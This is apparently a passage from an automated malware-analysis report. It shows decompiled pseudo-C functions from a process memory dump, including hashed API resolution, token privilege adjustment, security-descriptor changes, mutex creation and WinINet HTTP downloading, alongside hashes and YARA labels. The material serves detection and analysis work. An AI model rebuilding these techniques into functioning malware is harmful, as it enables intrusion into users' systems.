CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C89

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction ID: 905793d0daaa26e2a5b72c4c53da7d7b4e298965dc6cf40139e6e8747d7e902f
Opcode Fuzzy Hash: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction Fuzzy Hash: 0FE0D836784304B6EE2036E0FD17F9472945F11B66F104434FA8D751E6F6E279109AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0009BF50, Relevance: 1.7, APIs: 1, Instructions: 182
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0009BF50(void* __eflags, signed int _a4, signed int _a8) {
				signed int* _v20;
				char _v52;
				char _v159;
				signed int _t32;
				intOrPtr _t35;
				struct HINSTANCE__* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed int _t51;
				signed int* _t52;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				void* _t62;

				_t60 = _a8;
				_t32 = E00099D50(0x647402c4);
				_t62 = _t61 + 4;
				_t57 = _t60 % _t32;
				_t35 =  *((intOrPtr*)(0xb2cb8 + _t57 * 4));
				_t58 = _t57;
				if(_t35 == 0) {
					L4:
					_t51 = _a4;
					_v20 = 0xb2cb8 + _t58 * 4;
					if(_t51 > 0x23) {
						L39:
						_t37 =  *(0xb2134 + _t51 * 4);
						if( *(0xb2134 + _t51 * 4) != 0) {
							L49:
							_t38 = E0009D830(_t37, _t60);
							_t52 = _v20;
							__eflags = _t38;
							if(__eflags != 0) {
								L52:
								 *_t52 = _t60;
								 *(0xb4198 + _t58 * 4) = _t38;
								return _t38;
							}
							_t39 = E0009BF50(__eflags, 0, 0xba94474);
							 *_t39(0);
							L51:
							_t38 = 0;
							goto L52;
						}
						if(_t51 == 0x17) {
							_t37 =  *0xb37cc; // 0x0
							__eflags = _t37;
							if(__eflags != 0) {
								L48:
								 *(0xb2134 + _t51 * 4) = _t37;
								goto L49;
							}
							L46:
							_t41 = E0009BF50(_t77, 0, 0xba94474);
							 *_t41(0);
							 *(0xb2134 + _t51 * 4) = 0;
							_t52 = _v20;
							goto L51;
						}
						if(_t51 == 0x16) {
							_t37 =  *0xb4b38; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								goto L46;
							}
							goto L48;
						}
						if(_t51 != 0x15) {
							_t37 = LoadLibraryA( &_v52); // executed
							__eflags = _t37;
							if(__eflags != 0) {
								goto L48;
							}
							goto L46;
						}
						_t37 =  *0xb37d0; // 0x0
						_t77 = _t37;
						if(_t37 != 0) {
							goto L48;
						}
						goto L46;
					}
					switch( *((intOrPtr*)(_t51 * 4 +  &M000B00B0))) {
						case 0:
							L38:
							E0009C560( &_v52, E0009D0A0(0xb0550, 0xb0550,  &_v159), 0xffffffff);
							_t62 = _t62 + 0x14;
							goto L39;
						case 1:
							goto L38;
						case 2:
							__eax = 0xb0bfc;
							goto L38;
						case 3:
							__eax = 0xb0894;
							goto L38;
						case 4:
							__eax = 0xb1044;
							goto L38;
						case 5:
							__eax = 0xb05e2;
							goto L38;
						case 6:
							__eax = 0xb07e9;
							goto L38;
						case 7:
							__eax = 0xb043c;
							goto L38;
						case 8:
							__eax = 0xb0538;
							goto L38;
						case 9:
							__eax = 0xb0781;
							goto L38;
						case 0xa:
							__eax = 0xb09fc;
							goto L38;
						case 0xb:
							__eax = 0xb097c;
							goto L38;
						case 0xc:
							__eax = 0xb101b;
							goto L38;
						case 0xd:
							__eax = 0xb07a6;
							goto L38;
						case 0xe:
							__eax = 0xb068d;
							goto L38;
						case 0xf:
							__eax = 0xb0b87;
							goto L38;
						case 0x10:
							__eax = 0xb0c24;
							goto L38;
						case 0x11:
							__eax = 0xb0b75;
							goto L38;
						case 0x12:
							__eax = 0xb09bc;
							goto L38;
						case 0x13:
							__eax = 0xb04b8;
							goto L38;
						case 0x14:
							__eax = 0xb052c;
							goto L38;
						case 0x15:
							goto L39;
						case 0x16:
							__eax = 0xb0814;
							goto L38;
						case 0x17:
							__eax = 0xb0900;
							goto L38;
						case 0x18:
							__eax = 0xb0480;
							goto L38;
						case 0x19:
							__eax = 0xb076e;
							goto L38;
						case 0x1a:
							__eax = 0xb0699;
							goto L38;
						case 0x1b:
							__eax = 0xb04db;
							goto L38;
						case 0x1c:
							__eax = 0xb0c31;
							goto L38;
						case 0x1d:
							__eax = 0xb0b60;
							goto L38;
						case 0x1e:
							__eax = 0xb09c4;
							goto L38;
						case 0x1f:
							__eax = 0xb0a2c;
							goto L38;
						case 0x20:
							__eax = 0xb09a6;
							goto L38;
					}
				}
				0;
				0;
				while(1) {
					_t69 = _t35 - _t60;
					if(_t35 == _t60) {
						break;
					}
					E00091460(_t69, _t58, 1);
					_t62 = _t62 + 8;
					_t58 =  >  ? 0 : _t58 + 1;
					_t35 =  *((intOrPtr*)(0xb2cb8 + _t58 * 4));
					if(_t35 != 0) {
						continue;
					}
					goto L4;
				}
				return  *(0xb4198 + _t58 * 4);
			}

0x0009bf5c
0x0009bf64
0x0009bf69
0x0009bf74
0x0009bf76
0x0009bf7d
0x0009bf81
0x0009bfb6
0x0009bfb6
0x0009bfc0
0x0009bfc6
0x0009c0fe
0x0009c0fe
0x0009c107
0x0009c163
0x0009c165
0x0009c16d
0x0009c170
0x0009c172
0x0009c189
0x0009c189
0x0009c18b
0x00000000
0x0009c18b
0x0009c17b
0x0009c185
0x0009c187
0x0009c187
0x00000000
0x0009c187
0x0009c10c
0x0009c127
0x0009c12c
0x0009c12e
0x0009c15c
0x0009c15c
0x00000000
0x0009c15c
0x0009c130
0x0009c137
0x0009c141
0x0009c143
0x0009c14e
0x00000000
0x0009c14e
0x0009c111
0x0009c153
0x0009c158
0x0009c15a
0x00000000
0x00000000
0x00000000
0x0009c15a
0x0009c116
0x0009c1a1
0x0009c1a7
0x0009c1a9
0x00000000
0x00000000
0x00000000
0x0009c1ab
0x0009c11c
0x0009c121
0x0009c123
0x00000000
0x00000000
0x00000000
0x0009c125
0x0009bfd1
0x00000000
0x0009c0df
0x0009c0f6
0x0009c0fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0009bfee
0x00000000
0x00000000
0x0009bff8
0x00000000
0x00000000
0x0009c002
0x00000000
0x00000000
0x0009c00c
0x00000000
0x00000000
0x0009c016
0x00000000
0x00000000
0x0009c020
0x00000000
0x00000000
0x0009c02a
0x00000000
0x00000000
0x0009c034
0x00000000
0x00000000
0x0009c03e
0x00000000
0x00000000
0x0009c048
0x00000000
0x00000000
0x0009c052
0x00000000
0x00000000
0x0009c05c
0x00000000
0x00000000
0x0009c063
0x00000000
0x00000000
0x0009c06a
0x00000000
0x00000000
0x0009c071
0x00000000
0x00000000
0x0009c078
0x00000000
0x00000000
0x0009c07f
0x00000000
0x00000000
0x0009c086
0x00000000
0x00000000
0x0009c08d
0x00000000
0x00000000
0x00000000
0x00000000
0x0009c094
0x00000000
0x00000000
0x0009c09b
0x00000000
0x00000000
0x0009c0a2
0x00000000
0x00000000
0x0009c0a9
0x00000000
0x00000000
0x0009c0b0
0x00000000
0x00000000
0x0009c0da
0x00000000
0x00000000
0x0009c0b7
0x00000000
0x00000000
0x0009c0be
0x00000000
0x00000000
0x0009c0c5
0x00000000
0x00000000
0x0009c0cc
0x00000000
0x00000000
0x0009c0d3
0x00000000
0x00000000
0x0009bfd1
0x0009bf89
0x0009bf8d
0x0009bf90
0x0009bf90
0x0009bf92
0x00000000
0x00000000
0x0009bf97
0x0009bf9c
0x0009bfa8
0x0009bfab
0x0009bfb4
0x00000000
0x00000000
0x00000000
0x0009bfb4
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6b596c4b825b87af034dd83db79eddaacb788d6ace99750f3c6a484d6c5f2052
Instruction ID: 0b1bd87d8382e675236564e8b84030d3a1a2fb833d4548e60d4beaf6911734a0
Opcode Fuzzy Hash: 6b596c4b825b87af034dd83db79eddaacb788d6ace99750f3c6a484d6c5f2052
Instruction Fuzzy Hash: 5F517361F88309D7FF20AA98EC50EFFA2969795308F508132B507CB293D62ADD807756

Uniqueness

Uniqueness Score: -1.00%

Function 000AB390, Relevance: 1.6, APIs: 1, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000AB390(void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v74;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t29;
				signed char _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				intOrPtr* _t37;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t43;
				intOrPtr* _t45;
				void* _t47;
				void* _t48;
				signed char _t49;
				intOrPtr* _t50;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t68;

				_t55 = _a8;
				_t26 = E0009BF50(__eflags, 9, 0xc654d62);
				_t62 = _t61 + 8;
				_t27 =  *_t26(_t55, 1);
				_t56 = 0;
				_t75 = _t27;
				if(_t27 != 0) {
					_t29 = E0009BF50(_t75, 9, 0x4a9139c);
					_t31 = E000955C0( *_t29(_t55, 1, 0, 0), 0);
					_t64 = _t62 + 0x10;
					if((_t31 & 0x00000001) == 0) {
						_t50 = _a4;
						_v20 = 0;
						_t32 = E00091C20();
						_t77 = _t32 - 3;
						if(_t32 < 3) {
							__eflags = _t32 - 2;
							if(__eflags != 0) {
								goto L10;
							} else {
								_t33 = E0009BF50(__eflags, 9, 0xabc78f7);
								_t65 = _t64 + 8;
								_t34 =  *_t33(0xb10d8, 1,  &_v20, 0);
								__eflags = _t34;
								if(_t34 == 0) {
									goto L10;
								} else {
									goto L7;
								}
							}
						} else {
							_t43 = E00099D50(0x647400a5);
							_t45 = E0009BF50(_t77, _t43, E00099D50(0x6ec8785b));
							_t47 = E00097200(0xb10b0,  &_v74);
							_t48 =  *_t45(_t47, 1,  &_v20, 0); // executed
							_t49 = E000955C0(_t48, 0);
							_t65 = _t64 + 0x20;
							if((_t49 & 0x00000001) == 0) {
								L7:
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t35 = E00099D50(0x647400a5);
								_t37 = E0009BF50(__eflags, _t35, E00099D50(0x6cdc2320));
								_t68 = _t65 + 0x10;
								__eflags =  *_t37(_v20,  &_v28,  &_v32,  &_v24);
								if(__eflags == 0) {
									L9:
									_t39 = E0009BF50(__eflags, 0, 0x982abe5);
									 *_t39(_v20);
									goto L10;
								} else {
									_t41 = E0009BF50(__eflags, 9, 0x4a8239c);
									_t68 = _t68 + 8;
									__eflags =  *_t41(_t55, _v28, _v32, _v24);
									if(__eflags == 0) {
										goto L9;
									}
								}
							} else {
								L10:
								_v20 = 0xffffffff;
							}
						}
						if(_t50 != 0) {
							 *_t50 = 0xc;
							 *((intOrPtr*)(_t50 + 4)) = _t55;
							 *((intOrPtr*)(_t50 + 8)) = 0;
						}
						_t56 = _v20;
					}
				}
				return _t56;
			}

0x000ab399
0x000ab3a3
0x000ab3a8
0x000ab3ae
0x000ab3b0
0x000ab3b2
0x000ab3b4
0x000ab3c1
0x000ab3d5
0x000ab3da
0x000ab3df
0x000ab3e5
0x000ab3e8
0x000ab3ef
0x000ab3f4
0x000ab3f7
0x000ab451
0x000ab454
0x00000000
0x000ab45a
0x000ab461
0x000ab466
0x000ab476
0x000ab478
0x000ab47a
0x00000000
0x00000000
0x00000000
0x00000000
0x000ab47a
0x000ab3f9
0x000ab3fe
0x000ab417
0x000ab42a
0x000ab43b
0x000ab440
0x000ab445
0x000ab44a
0x000ab480
0x000ab480
0x000ab487
0x000ab48e
0x000ab49a
0x000ab4b3
0x000ab4b8
0x000ab4cc
0x000ab4ce
0x000ab4ef
0x000ab4f6
0x000ab501
0x00000000
0x000ab4d0
0x000ab4d7
0x000ab4dc
0x000ab4eb
0x000ab4ed
0x00000000
0x00000000
0x000ab4ed
0x000ab44c
0x000ab503
0x000ab503
0x000ab503
0x000ab44a
0x000ab50c
0x000ab50e
0x000ab514
0x000ab517
0x000ab517
0x000ab51e
0x000ab51e
0x000ab3df
0x000ab52a

APIs

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000), ref: 000AB43B

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: DescriptorSecurity$ConvertLibraryLoadString
String ID:
API String ID: 3927295052-0
Opcode ID: b422763720d8ec2f1195fc1ee137594ed78134cb5476533bc3a2dd39b7380023
Instruction ID: cdfd1708e76530cfbf0315baddca517396f0df51418b593272bf9a4082254807
Opcode Fuzzy Hash: b422763720d8ec2f1195fc1ee137594ed78134cb5476533bc3a2dd39b7380023
Instruction Fuzzy Hash: EA41B7B2D402156BEF216BE0AC53FFF7668AF11715F050424FA18B5283F7A1AA0596E2

Uniqueness

Uniqueness Score: -1.00%

Function 0009D270, Relevance: 1.6, APIs: 1, Instructions: 98
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009D270(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				signed short _v32;
				intOrPtr _v40;
				char _v44;
				void* _t22;
				void* _t23;
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t37;
				void* _t43;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;

				_t22 = E000AFCF0(__ecx);
				_t54 =  &_v44;
				_t23 = E000A0190(__eflags, _t22,  &_v44);
				_t57 = _t56 + 8;
				_t64 = _t23;
				if(_t23 == 0) {
					_t43 = 0;
				} else {
					_t26 = E000AB790(_t64,  *0xb2838, _v44, _v32 & 0x0000ffff, _a8); // executed
					_t58 = _t57 + 0x10;
					if(_t26 == 0) {
						_t43 = 0;
					} else {
						_v20 = 1 + (0 | _v30 == 0x00000002) * 4;
						_t31 = E000AF190(__edx);
						_t32 = E000AEE10(__edx);
						_v20 = _t26;
						_t33 = E000ABAD0(_v30 - 2, _t26, _v40, 0, _t32, _t31, _v20); // executed
						_t61 = _t58 - 4 + 0x1c;
						if(_t33 == 0) {
							_t43 = 0;
							_t54 =  &_v44;
						} else {
							_t53 = _t33;
							_t37 = E00091AF0(_t53,  &_v28, 0,  *0xb2c80); // executed
							_t62 = _t61 + 0x10;
							_t68 = _t37;
							_t54 =  &_v44;
							if(_t37 == 0) {
								_t43 = 0;
								__eflags = 0;
							} else {
								E000AF410(_v28, _a4, _v28, _v24 + _v28);
								E0009B570(_v28);
								_t62 = _t62 + 4;
								_t43 = 1;
							}
							E0009BF50(_t68, 0x13, 0x714b685);
							_t61 = _t62 + 8;
							InternetCloseHandle(_t53); // executed
						}
						E000ABA40(_t68, _v20);
						_t58 = _t61 + 4;
					}
					E000AB690(_t54);
				}
				return _t43;
			}

0x0009d27b
0x0009d280
0x0009d285
0x0009d28a
0x0009d28d
0x0009d28f
0x0009d337
0x0009d295
0x0009d2a6
0x0009d2ab
0x0009d2b0
0x0009d33b
0x0009d2b6
0x0009d2ca
0x0009d2cd
0x0009d2d6
0x0009d2e8
0x0009d2ec
0x0009d2f1
0x0009d2f6
0x0009d33f
0x0009d341
0x0009d2f8
0x0009d2f8
0x0009d307
0x0009d30c
0x0009d30f
0x0009d311
0x0009d314
0x0009d346
0x0009d346
0x0009d316
0x0009d323
0x0009d32b
0x0009d330
0x0009d333
0x0009d333
0x0009d34f
0x0009d354
0x0009d358
0x0009d358
0x0009d35e
0x0009d363
0x0009d363
0x0009d367
0x0009d36c
0x0009d378

APIs

Part of subcall function 000AB790: InternetOpenA.WININET(000B0580,?,00000000,00000000,00000000,?,0009CD77,?,?,?,00000001,00000000,?,0009CD77,?,00000001), ref: 000AB7C2
Part of subcall function 000AB790: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000AB862

Part of subcall function 000ABAD0: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000ABBA3

Part of subcall function 00091AF0: InternetReadFile.WININET(?,?,00040000,00040000), ref: 00091B86

InternetCloseHandle.WININET(00000000), ref: 0009D358

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Internet$Open$CloseConnectFileFreeHandleHeapHttpReadRequest
String ID:
API String ID: 3651809878-0
Opcode ID: d7d22948cb9a4f5c1e9cd48b0aac864fac0640b8ca60a1617f4aa234b30d8a89
Instruction ID: 08c8c731cd60d4795642b458628f1f94130608dbed7bd3f3a156df419ae2e68f
Opcode Fuzzy Hash: d7d22948cb9a4f5c1e9cd48b0aac864fac0640b8ca60a1617f4aa234b30d8a89
Instruction Fuzzy Hash: 7321E4B2E401096BDF00ABE4AC42AFF7BB9DF45754F084435FA04A7203E7759A15A6A2

Uniqueness

Uniqueness Score: -1.00%

Function 000A0F60, Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E000A0F60(void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v88;
				char _v288;
				void* _t18;
				intOrPtr* _t20;
				void* _t23;
				void* _t24;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				void* _t45;
				void* _t51;
				void* _t52;
				void* _t55;

				_t55 = __eflags;
				_v20 = 0;
				E000A9C90(_t55, E00097200(0xb1060,  &_v88), 1); // executed
				_t18 = E00099D50(0x647400a5);
				_t20 = E0009BF50(_t55, _t18, E00099D50(0x6ec8785b));
				_t36 =  !=  ? 0xb08d0 : 0xb10b0;
				_t23 = E00097200( !=  ? 0xb08d0 : 0xb10b0,  &_v288);
				_t51 = _t45 + 0x28;
				_t24 =  *_t20(_t23, 1,  &_v20, 0);
				_t57 = _t24;
				if(_t24 != 0) {
					_v24 = 0;
					_t26 = E0009BF50(_t57, 9, 0x8a8238c);
					_t52 = _t51 + 8;
					_t27 =  *_t26(_v20,  &_v32,  &_v24,  &_v28);
					_t58 = _t27;
					if(_t27 != 0) {
						_t30 = E0009BF50(_t58, 9, 0x90ec817);
						_t31 = E00099D50(0x647400bc);
						_t52 = _t52 + 0xc;
						 *_t30(_a4, _a8, _t31, 0, 0, 0, _v24); // executed
					}
					_t28 = E0009BF50(_t58, 0, 0x982abe5);
					 *_t28(_v20);
				}
				return 1;
			}

0x000a0f60
0x000a0f72
0x000a0f8a
0x000a0f97
0x000a0fb0
0x000a0fc6
0x000a0fd1
0x000a0fd6
0x000a0fe2
0x000a0fe4
0x000a0fe6
0x000a0fe8
0x000a0ff6
0x000a0ffb
0x000a100d
0x000a100f
0x000a1011
0x000a101d
0x000a102f
0x000a1034
0x000a1043
0x000a1043
0x000a104c
0x000a1057
0x000a1057
0x000a1065

APIs

Part of subcall function 000A9C90: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000A9D70

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

SetNamedSecurityInfoW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 000A1043

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AdjustInfoLibraryLoadNamedPrivilegesSecurityToken
String ID:
API String ID: 2785814242-0
Opcode ID: 53d3e8d696b554b7c62aea9b8f815d1285d86a263c3720ca7b5fc58d2305688d
Instruction ID: d0b0b4c89df3dddfb10bebbd31f6cbdb2178e57db3e88d39798a30296292a3ab
Opcode Fuzzy Hash: 53d3e8d696b554b7c62aea9b8f815d1285d86a263c3720ca7b5fc58d2305688d
Instruction Fuzzy Hash: E721D8B2E402197BEF1066A0AC13FFF36689B11714F050434FA18B6283F5A16A1487F2

Uniqueness

Uniqueness Score: -1.00%

Function 000A2F00, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E000A2F00(void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				char _v118;
				char _v160;
				intOrPtr* _t9;
				intOrPtr* _t13;
				intOrPtr* _t16;
				struct HINSTANCE__* _t17;
				WCHAR* _t19;
				struct HWND__* _t22;
				char* _t25;

				_t36 = __eflags;
				_t25 =  &_v56;
				E000A8F20(_t25, 0x28);
				_v52 = E000A1070;
				_t9 = E0009BF50(__eflags, 0, 0xa39ecc7);
				_v40 =  *_t9(0);
				_v20 = E00097200(0xb0c10,  &_v118);
				_t13 = E0009BF50(_t36, 1, 0x38227e7);
				 *_t13(_t25);
				E0009BF50(_t36, 1, 0xf3c7b77);
				_t16 = E0009BF50(_t36, 0, 0xa39ecc7);
				_t17 =  *_t16(0);
				_t19 = E00097200(0xb0790,  &_v84);
				_t22 = CreateWindowExW(0, E00097200(0xb0c10,  &_v160), _t19, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, _t17, 0); // executed
				return _t22;
			}

0x000a2f00
0x000a2f0c
0x000a2f12
0x000a2f1a
0x000a2f28
0x000a2f34
0x000a2f48
0x000a2f52
0x000a2f5b
0x000a2f64
0x000a2f75
0x000a2f7f
0x000a2f8c
0x000a2fce
0x000a2fda

APIs

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

CreateWindowExW.USER32(00000000,00000000,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000A2FCE

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateLibraryLoadWindow
String ID:
API String ID: 4174337752-0
Opcode ID: b33be60579bcbc8d244ce09eea1e3476b85ed4de72df16617eecf2a092608ca4
Instruction ID: 8cf9f4e8ccaace393dda7e269f6ab2b87a3cdffb05642fcb61ba9ad7d9cde57a
Opcode Fuzzy Hash: b33be60579bcbc8d244ce09eea1e3476b85ed4de72df16617eecf2a092608ca4
Instruction Fuzzy Hash: EA111277E942187AF76066F06C03FEE76589B51B15F240125FF0C79283EAD12A1446B6

Uniqueness

Uniqueness Score: -1.00%

Function 00091490, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00091490(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
				signed int _v20;
				char _v540;
				void* _t16;
				long _t23;
				intOrPtr* _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;
				void* _t31;
				void* _t33;

				_t27 = _a20 & 0x000000ff;
				_t28 = 0;
				_v20 = _a24 & 0x000000ff;
				do {
					_t14 =  &_v540;
					E00095CD0(_t35, _a4,  &_v540, _t27, _v20);
					_t16 = E000A8960(_a12, _a8, _t14);
					_t33 = _t31 + 0x1c;
					if(_t16 == 0) {
						goto L2;
					}
					_t37 = _a16;
					if(_a16 == 0) {
						L1:
						E0009BF50(__eflags, 0, 0xbf8ba27);
						_t33 = _t33 + 8;
						_t23 = GetFileAttributesW(_a12); // executed
						__eflags = _t23 - 0xffffffff;
						if(__eflags == 0) {
							return 1;
						}
						goto L2;
					}
					_t25 = E0009BF50(_t37, 3, 0xd85c117);
					_t33 = _t33 + 8;
					_t26 =  *_t25(_a12, _a16);
					_t38 = _t26;
					if(_t26 != 0) {
						goto L1;
					}
					L2:
					_t30 = E000922E0(_t38, 0,  !_t28);
					E00091460(_t38, _t28, 1);
					_t31 = _t33 + 0x10;
					_t35 = _t30 - 0x64;
					_t28 = _t30;
				} while (_t30 != 0x64);
				return 0;
			}

0x000914a0
0x000914a4
0x000914a6
0x000914ec
0x000914f0
0x000914fc
0x0009150b
0x00091510
0x00091515
0x00000000
0x00000000
0x00091517
0x0009151b
0x000914b0
0x000914b7
0x000914bc
0x000914c2
0x000914c4
0x000914c7
0x00000000
0x00091542
0x00000000
0x000914c7
0x00091524
0x00091529
0x00091532
0x00091534
0x00091536
0x00000000
0x00000000
0x000914c9
0x000914d8
0x000914dd
0x000914e2
0x000914e5
0x000914e8
0x000914e8
0x00000000

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction ID: 03da179e66cfeac96f9f0c36ae48a9726aeeea956ce1e1fcd64655db540d2e03
Opcode Fuzzy Hash: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction Fuzzy Hash: 67113D72A4021A7BDF112E61AC02BFE3A699F55765F050120FC29A51D3F532CE20B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 000AB710, Relevance: 1.6, APIs: 1, Instructions: 50
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000AB710(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _t5;
				intOrPtr* _t8;
				void* _t10;
				intOrPtr* _t11;
				void* _t15;
				void* _t17;

				E0009BF50(__eflags, 0, 0xee41457);
				_t5 = CreateMutexW(_a4, 0, _a8); // executed
				_t17 = 0;
				_t25 = _t5;
				if(_t5 != 0) {
					_t15 = _t5;
					_t8 = E0009BF50(_t25, 0, E00099D50(0x640dea48));
					_t10 = E00093750(_t25,  *_t8(_t15, _a12), 0xffffff7f);
					_t26 = _t10;
					if(_t10 == 0) {
						_t17 = _t15;
					} else {
						_t11 = E0009BF50(_t26, 0, 0xb8e7db5);
						 *_t11(_t15);
					}
				}
				return _t17;
			}

0x000ab723
0x000ab72f
0x000ab731
0x000ab733
0x000ab735
0x000ab73a
0x000ab74c
0x000ab75e
0x000ab766
0x000ab768
0x000ab77e
0x000ab76a
0x000ab771
0x000ab77a
0x000ab77a
0x000ab768
0x000ab786

APIs

CreateMutexW.KERNEL32(?,00000000,000B2850,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000AB72F

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateLibraryLoadMutex
String ID:
API String ID: 427046056-0
Opcode ID: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction ID: e1a553a33ae1fcedd2996e0e2f1cc664e70b3df4c43124e9b37a272d12d64a21
Opcode Fuzzy Hash: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction Fuzzy Hash: E7F062ABA4521837EA1025F57C53FBF724C8BD2B66F050020FE1CA7287EA91AD0056F2

Uniqueness

Uniqueness Score: -1.00%

Function 00098290, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00098290(intOrPtr _a4) {
				void* _t4;
				long _t6;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t19 = _t9;
				if(_t9 == 0) {
					__eflags = 0;
					return 0;
				}
				_t4 = E00091460(_t19, _t9, E00099D50(0x1bde8cd4));
				_t6 = E000922E0(_t19, _t4 + 4, E00099D50(0x1bde8cd4));
				E0009BF50(_t19, 0, 0x8685de3);
				_t8 = RtlAllocateHeap( *0xb2124, 8, _t6); // executed
				return _t8;
			}

0x00098294
0x00098297
0x00098299
0x000982ec
0x00000000
0x000982ec
0x000982aa
0x000982c6
0x000982d7
0x000982e8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e459e1d3ec2232cc4591ea6ce7c0c7c6018a9fad2a67d1224fd1219211554c8
Instruction ID: b47334337243ddb6a87379554c9306c69a174ebb3430ee892321c1dcaa6944d1
Opcode Fuzzy Hash: 7e459e1d3ec2232cc4591ea6ce7c0c7c6018a9fad2a67d1224fd1219211554c8
Instruction Fuzzy Hash: D1E03067D525257BE95132A47C03AEB35484B137BAF0A0130FD0DB6243E9426A1423FB

Uniqueness

Uniqueness Score: -1.00%

Function 000AC210, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000AC210(void* __eflags) {
				char _v408;
				intOrPtr* _t2;
				signed short _t3;
				void* _t5;

